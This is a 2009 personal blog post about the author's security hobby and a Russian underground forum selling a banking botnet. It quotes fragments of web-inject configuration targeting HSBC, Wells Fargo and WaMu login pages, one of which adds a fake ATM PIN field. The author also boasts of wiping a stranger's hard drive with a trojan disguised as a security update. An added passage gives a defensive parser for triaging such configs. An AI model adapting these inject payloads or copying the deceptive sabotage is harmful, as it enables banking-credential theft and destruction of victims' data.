April 30, 2009

The Underground of the Cyber Age, PT I

Since i got my first PC back in 1999, i tore the thing apart to see how it works. I played with this and that, i was curious. In the true sense of the word, i was a hacker. Even long before i knew what a PC was, when it came to anything mechanical or electronic. I wanted to see how it worked, to see if i could make it work better and even make it do things it wasn't meant to do.

This whole new Cyber World was interesting. I could talk to people from long distances without running up a phone bill. I could put my art out there for everyone to see and i could run into more assholes than i wanted to. But when the time came and i lost my bank card to someone on the net, i learned of a whole new genre or sub-sect of this Cyber World.

Call them hackers, phreakers or script kiddies, these groups of people have a whole other way of living in their off time and some full time. So back in the year 2000, i started to teach myself computer security. I didn't want this to happen again. So i read everything i could. Learned what a virus was, how worms worked, what a trojan was. Even taught myself how to code some of these things. I created a few small simple viruses that did nothing but replicate a text file up to 1,000 times before it deleted itself. But i never released it to the public or in the "wild".

I even used the popular trojans of the day like Sub7, Back Orifice and Hack'a'Tack. And out of the countless systems that were ever compromised, i learnt how to subvert firewalls and security software. And out of all those systems, only once and once ever did i damage a system. Some guy in Italy looking at child porn. I played with him a few minutes then i uploaded a program called Hard Drive Killer and set it to look like his security software. Gave him an error message that his software errored and he needed to update it. He ran my software and boom, no more hard drive.

Shortly after that, i got bored with all of that. I got good at removing the infections that the others were releasing. It even landed me some jobs and cash helping protect PCs. And i have stuck with that path for a long time now. And in my current job, i am doing just that plus a lot of other PC related business. But in the last 6-8 months, i have been looking into a career change. That along the lines of computer forensics. So i started looking into it as i went about my daily business. And during this time, including today, i have dealt with all of the new viruses, infections, malware, etc. And i have seen how much more sophisticated it has become and how much harder it is for the security vendors to keep up with it. A perfect example is with the new Conficker worm. For the longest time, no one knew what was going to happen when it went off.

Anyways, i read on a daily basis of all the lawsuits for copyright this, trademark this, RIAA, MPAA, etc. And then i read my security blogs and other news. And the amount of people i talk to on a daily basis that really have no clue on what the PC really is other than a toy to get music and watch movies. How much we have become dependent on a piece of machinery to run our lives. And yet i just found out, no matter how much i have read, i'm the one that really doesn't understand. Just the other night, i got that wake up call.

I was Googling for something, which i have forgotten what it was, i came across a link. Opening the link to the site, i discovered a tool that i had heard about only a month before all over the different sites i read. A new virus maker. Cool i thought, a new toy i can play with and look at. So i downloaded it, loaded up my virtual pc and had a look. Nothing special. It could create a small virus that does a lot from blocking certain aspects of the PC to formatting the hard drive. I've seen these programs in the past. So as i was ready to call it a night, i opened the Read Me file that was with it. In the file, it included the site of the maker. So i opened it. Total foreign language. But there was something in English so i had a look. One thing led to another and i found other sites, and more sites and more sites.

I Googled a few of these sites and nothing came in return. I tried a few more and got a few lucky results. But the ones that really have the goods, weren't coming up in any search. So i bookmarked them for later viewing and went to bed. Just the other night, i started looking through these sites on my virtual PC. I came across one i had bookmarked and started reading through the forums. Some of it in English, some of it in Russian. Next thing i knew, after downloading and looking at some things, and done reading for the night, it was 5am.

Last night however, really opened my eyes. It made me realize that what i thought was the underground of the Cyber World is more a facade of kids and automated programs. On one of these sites, there was talk from a hacker about a new botnet he was working on. For those of you who don't know what a botnet is, read this.

So i'm reading through this post. The hacker is from Russia. Along with a few of his counterparts on this site. He goes on to talk about what this new botnet is. He even put a beta version of it out for other people to take a look at. This post and some of the others i have read, is where it all kind of comes together.

Basically, the hacker creates the worms, viruses or botnets and then sells them to the highest bidder. The things these people create are not your everyday run of the mill things you might see. But the complicated and sophisticated stuff that can really do a number. This hacker said that once it's done, he will have a public release for anyone to use, then a private release which is for sale that has more controls in it as well as support for it. His asking price, currently around $3,000. That's a hell of a lot of money for a piece of programming, but then so is the price of some of the software i have bought over the years.

Apparently that's how this underground works. And the price varies depending on the product. So i continued reading and even downloaded his trial version. Now, i'm a mediocre web designer. I can code in HTML, XHTML, CSS and some PHP. But what i saw was speechless. What i had in my hand, was the newest, undetectable banking botnet. Meaning, it was designed to steal any and all banking, eBay, PayPal information from one's PC once it was infected. This is accomplished by what's called a drive by download. Same thing as a drive by shooting, only instead of a human life, it's your financial life.

So i started going through the code. Some of it i understood. Most of it, was a little over my head, but i'm sure i can figure it all out. But even then, it wasn't the code that got me. It was what was in the included files that struck a nerve. So what was it? I'll paste only a few parts of it, with modified code so it shows up.



set_url https://www.us.hsbc.com/* GL
data_before
< cellspacing="0" summary="page layout">
data_end
data_inject
data_end
data_after
< /table>
data_end


set_url https://online.wellsfargo.com/login* GP
data_before
< input type="password" name="password"*
data_end
data_inject
< width="225">< for="password" class="formlabel">3. ATM PIN< /label><>
< type="password" name="USpass" id="atmpin" size="20" maxlength="14" title="Enter ATM PIN" tabindex="11" accesskey="A">
<> < /td>
data_end
data_after
data_end
data_before
< for="account" class="formlabel">
data_end
data_inject
4. Sign on to
data_end
data_after
< /label>
data_end


set_url https://online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary GL
data_before
_accountSummaryContainer"*< /tr>
data_end
data_inject
data_end
data_after
< /table>
data_end




And the list went on and on and on. Then after the listing of the financial business, was all of the extra injection code. All of this is designed to get your username and passwords to your banks, PayPal, etc and email it in a text file back to whoever controls it. And on the other side, is someone looking to make a few extra (thousands) dollars. All for buying a program someone created. So what does this mean to you and me? When you're browsing the internet, be careful. Any site on the net can be infected with one of these drive by downloads.
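For triaging a configuration laid out like the excerpt above, here is an added example (not from the original post or from the kit it describes): a small Python parser that reports which extra form fields each targeted URL pattern would add to a page. The sample input is constructed with a placeholder host, and the function names are hypothetical.

```python
import re

# Constructed sample laid out like the excerpt above; bank.example is a placeholder.
SAMPLE = """\
set_url https://bank.example/login* GP
data_before
< input type="password" name="password"*
data_end
data_inject
< type="password" name="USpass" id="atmpin" title="Enter ATM PIN">
data_end
set_url https://bank.example/summary GL
data_before
_accountSummaryContainer"*< /tr>
data_end
data_inject
data_end
"""

SECTIONS = ("data_before", "data_inject", "data_after")
ATTR = re.compile(r'(\w+)="([^"]*)"')

def parse_webinjects(text):
    """Split the config into targets, each with its URL pattern, flags and sections."""
    targets, section, buf = [], None, []
    for raw in text.splitlines():
        line = raw.strip()
        if section is not None:            # inside a section: collect until data_end
            if line == "data_end":
                targets[-1]["sections"].append((section, "\n".join(buf)))
                section = None
            else:
                buf.append(raw)
        elif line.startswith("set_url "):
            _, url, *flags = line.split()
            targets.append({"url": url, "flags": "".join(flags), "sections": []})
        elif line in SECTIONS and targets:
            section, buf = line, []
    return targets

def triage(text):
    """Map each targeted URL pattern to the (name, type) of fields it would inject."""
    report = {}
    for target in parse_webinjects(text):
        injected = "\n".join(b for k, b in target["sections"] if k == "data_inject")
        attrs = [dict(ATTR.findall(tag)) for tag in re.findall(r"<[^>]*>", injected)]
        report[target["url"]] = [(a["name"], a.get("type", "")) for a in attrs if "name" in a]
    return report
```

A target whose list contains a password-type field that the genuine login form never asks for, such as an ATM PIN, is the signal to hand to the affected institution's fraud team.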

The fact that someone has taken this "toy" that we use on a daily basis and used it in a way that makes the mob of the days gone by look like children is in fact scary. Most people only hear about it on the news or in the paper. Very few understand it, many more could care less. But when you have an understanding of a few aspects of what's happening, and to finally see this in full black and white, it gives you a whole new outlook on the entire Cyber World thing.

Will this ever stop? 90% no. Only because these people have the knowledge and the know how to craft their skills to stay ahead of the norm. Though a few get picked off here and there, the underground is so large, we would have to cull the planet of PCs and the govts of the world would have to outlaw them. And even then, i don't think it would be 100% gone.

Copyright © Alt+F4 | Powered by Blogger